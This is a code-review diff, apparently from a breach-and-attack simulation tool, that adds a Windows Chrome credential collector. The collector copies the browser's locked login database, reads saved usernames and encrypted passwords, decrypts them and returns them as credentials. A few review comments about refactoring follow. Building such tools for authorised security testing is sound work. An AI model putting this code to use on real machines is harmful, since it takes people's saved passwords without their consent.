monkey/agent_plugins/credentials_collectors/chrome/src/windows_credentials_database_processor.py

```diff
@@ -1,16 +1,127 @@
+
+logger = logging.getLogger(__name__)
+
+
+DATABASE_QUERY = "SELECT username_value, password_value FROM logins"
+
+
+def get_logins_from_database(database_path: Path) -> Iterator[Tuple[str, bytes]]:
+    with tempfile.NamedTemporaryFile() as temporary_database_file:
+        temporary_database_path = Path(tempfile.gettempdir()) / temporary_database_file.name
+
+        # copy database before querying it to bypass lock errors
+        with open(database_path, "rb") as database_file:
+            shutil.copyfileobj(database_file, temporary_database_file)
+
+        try:
+            yield from _extract_credentials(temporary_database_path)
+        except Exception as err:
+            logger.debug(f"{err}")
+
+
+def _extract_credentials(temporary_database_path: Path) -> Iterator[Tuple[str, bytes]]:
+    try:
+        conn = sqlite3.connect(temporary_database_path)
+        for user, password in conn.execute(DATABASE_QUERY):
+            yield user, password
+    except Exception as err:
+        logger.error(f"Encountered an exception while connecting to database: {err}")
+
+
+DatabaseReader = Callable[[Path], Iterator[Tuple[str, bytes]]]
 
 
 class WindowsCredentialsDatabaseProcessor:
-    def __init__(self):
-        pass
+    def __init__(self, database_reader: DatabaseReader = get_logins_from_database):
+        self._read_logins_from_database = database_reader
 
     def __call__(
         self, interrupt: Event, database_paths: Collection[BrowserCredentialsDatabasePath]
     ) -> Collection[Credentials]:
-        return []
+        credentials = []
+
+        for item in interruptible_iter(database_paths, interrupt):
+            for user, password in self._read_logins_from_database(item.database_file_path):
+                try:
+                    decrypted_password = self._decrypt_password(password, item.master_key)
+                    if user or decrypted_password:
+                        credentials.append((user, decrypted_password))
+                except Exception as err:
+                    logger.error(
+                        f"Encountered an exception while trying to decrypt the password: {err}"
+                    )
+                    # even if the password couldn't be decrypted, we don't want to lose the username
+                    credentials.append((user, None))
+        return [
+            Credentials(
+                identity=self._get_identity(user),
+                secret=self._get_password(password),
+            )
+            for user, password in set(credentials)
+        ]
+
+    @staticmethod
+    def _get_identity(user: str):
+        try:
+            return EmailAddress(email_address=user)
+        except ValueError:
+            return Username(username=user)
+
+    @staticmethod
+    def _get_password(password: Optional[str]) -> Optional[Password]:
+        if password is None:
+            return None
+        return Password(password=password)
```

Comment:
This is pretty generic. We should move these closer to `Credentials`.

Reply:
Although I'm not sure how we'd implement `_get_secret` since it's hard for us to decide if a hash is an LM hash or an NT hash.

Reply:
We have it as well in RDP, so makes sense.